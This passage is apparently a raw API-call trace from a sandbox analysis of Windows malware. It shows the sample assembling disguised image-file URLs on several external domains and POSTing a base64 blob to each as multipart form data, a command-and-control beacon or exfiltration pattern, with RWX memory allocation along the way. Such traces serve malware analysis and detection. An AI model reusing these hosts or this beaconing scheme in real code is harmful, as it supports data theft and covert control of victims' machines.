(lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0089.994] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0089.994] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0089.994] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0089.994] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0089.994] InternetConnectW (hInternet=0xcc0004, lpszServerName="goodapd.website", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0089.994] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0089.995] wsprintfW (in: param_1=0x3010000, param_2="%s" | out: param_1="static/imgs/memethke.gif") returned 24 [0089.995] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/imgs/memethke.gif", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0089.995] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3000000, dwOptionalLength=0x24c) returned 0 [0090.039] GetLastError () returned 0x2ee7 [0090.039] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0090.039] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0090.039] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.039] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.039] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0090.039] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://oceanlinen.com") returned 21 [0090.040] lstrcpyW (in: lpString1=0x2e8d880, lpString2="content" | out: lpString1="content") returned="content" [0090.040] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pics" | out: lpString1="pics") returned="pics" [0090.040] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="fu" | out: lpString1="fu") returned="fu" [0090.040] lstrcatW (in: lpString1="fu", lpString2="so" | out: lpString1="fuso") returned="fuso" [0090.040] lstrcpyW (in: lpString1=0x2e8de80, lpString2="gif" | out: lpString1="gif") returned="gif" [0090.040] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://oceanlinen.com/content/pics/fuso.gif") returned 43 [0090.040] lstrlenW (lpString="http://oceanlinen.com/content/pics/fuso.gif") returned 43 [0090.040] lstrcpyW (in: lpString1=0x2e8d618, lpString2="content/pics/fuso.gif" | out: lpString1="content/pics/fuso.gif") returned="content/pics/fuso.gif" [0090.040] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0090.040] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0090.040] InternetConnectW (hInternet=0xcc0008, lpszServerName="oceanlinen.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0090.040] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0090.040] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0090.040] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0090.524] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0090.524] lstrcmpiA (lpString1="42x", lpString2="30x") returned 1 [0090.524] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0090.524] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0090.524] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0090.524] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0090.525] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0090.525] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0090.525] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0090.525] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0090.525] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0090.525] InternetConnectW (hInternet=0xcc0004, lpszServerName="oceanlinen.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0090.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0090.525] wsprintfW (in: param_1=0x3010000, param_2="%s" | out: param_1="content/pics/fuso.gif") returned 21 [0090.525] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="content/pics/fuso.gif", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0090.525] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3000000*, dwOptionalLength=0x24c | out: lpOptional=0x3000000*) returned 1 [0090.739] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0090.739] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0090.739] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.740] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.740] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0090.740] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://tommarmores.com.br") returned 25 [0090.740] lstrcpyW (in: lpString1=0x2e8d880, lpString2="news" | out: lpString1="news") returned="news" [0090.740] lstrcpyW (in: lpString1=0x2e8da80, lpString2="imgs" | out: lpString1="imgs") returned="imgs" [0090.740] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="da" | out: lpString1="da") returned="da" [0090.740] lstrcatW (in: lpString1="da", lpString2="am" | out: lpString1="daam") returned="daam" [0090.740] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0090.740] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://tommarmores.com.br/news/imgs/daam.jpg") returned 44 [0090.740] lstrlenW (lpString="http://tommarmores.com.br/news/imgs/daam.jpg") returned 44 [0090.740] lstrcpyW (in: lpString1=0x2e8d618, lpString2="news/imgs/daam.jpg" | out: lpString1="news/imgs/daam.jpg") returned="news/imgs/daam.jpg" [0090.740] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0090.740] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0090.740] InternetConnectW (hInternet=0xcc0008, lpszServerName="tommarmores.com.br", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0090.740] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0090.740] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0090.740] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0093.507] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0093.507] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0093.509] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0093.557] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0093.557] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0093.557] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0093.558] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0093.558] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0093.558] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0093.558] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0093.558] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0093.558] InternetConnectW (hInternet=0xcc0004, lpszServerName="tommarmores.com.br", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0093.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0093.558] wsprintfW (in: param_1=0x3010000, param_2="%s" | out: param_1="news/imgs/daam.jpg") returned 18 [0093.558] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="news/imgs/daam.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0093.558] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3000000*, dwOptionalLength=0x24c | out: lpOptional=0x3000000*) returned 1 [0117.473] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0117.474] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0117.474] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.475] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.475] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0117.475] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://nesten.dk") returned 16 [0117.475] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0117.475] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pics" | out: lpString1="pics") returned="pics" [0117.475] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="he" | out: lpString1="he") returned="he" [0117.475] lstrcatW (in: lpString1="he", lpString2="so" | out: lpString1="heso") returned="heso" [0117.475] lstrcatW (in: lpString1="heso", lpString2="me" | out: lpString1="hesome") returned="hesome" [0117.475] lstrcatW (in: lpString1="hesome", lpString2="im" | out: lpString1="hesomeim") returned="hesomeim" [0117.475] lstrcatW (in: lpString1="hesomeim", lpString2="de" | out: lpString1="hesomeimde") returned="hesomeimde" [0117.475] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0117.475] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://nesten.dk/uploads/pics/hesomeimde.jpg") returned 44 [0117.475] lstrlenW (lpString="http://nesten.dk/uploads/pics/hesomeimde.jpg") returned 44 [0117.475] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/pics/hesomeimde.jpg" | out: lpString1="uploads/pics/hesomeimde.jpg") returned="uploads/pics/hesomeimde.jpg" [0117.475] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0117.475] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0117.475] InternetConnectW (hInternet=0xcc0008, lpszServerName="nesten.dk", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0117.475] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0117.476] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0117.476] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0119.841] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0119.841] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0119.841] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0119.843] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0119.843] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0119.843] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0119.844] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0119.844] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0119.844] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0119.844] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0119.844] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0119.844] InternetConnectW (hInternet=0xcc0004, lpszServerName="nesten.dk", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0119.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0119.845] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="uploads/pics/hesomeimde.jpg") returned 27 [0119.845] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/pics/hesomeimde.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0119.845] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0120.344] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0120.345] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0120.345] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.346] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.346] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0120.346] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://zaeba.co.uk") returned 18 [0120.346] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0120.347] lstrcpyW (in: lpString1=0x2e8da80, lpString2="assets" | out: lpString1="assets") returned="assets" [0120.347] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="ka" | out: lpString1="ka") returned="ka" [0120.347] lstrcatW (in: lpString1="ka", lpString2="th" | out: lpString1="kath") returned="kath" [0120.347] lstrcatW (in: lpString1="kath", lpString2="mo" | out: lpString1="kathmo") returned="kathmo" [0120.347] lstrcatW (in: lpString1="kathmo", lpString2="ru" | out: lpString1="kathmoru") returned="kathmoru" [0120.347] lstrcpyW (in: lpString1=0x2e8de80, lpString2="bmp" | out: lpString1="bmp") returned="bmp" [0120.347] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://zaeba.co.uk/uploads/assets/kathmoru.bmp") returned 46 [0120.347] lstrlenW (lpString="http://zaeba.co.uk/uploads/assets/kathmoru.bmp") returned 46 [0120.347] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/assets/kathmoru.bmp" | out: lpString1="uploads/assets/kathmoru.bmp") returned="uploads/assets/kathmoru.bmp" [0120.347] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0120.347] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0120.347] InternetConnectW (hInternet=0xcc0008, lpszServerName="zaeba.co.uk", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0120.347] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0120.347] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0120.347] HttpSendRequestW (hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0 [0121.697] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0121.697] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0121.697] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0121.697] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0121.697] lstrlenA 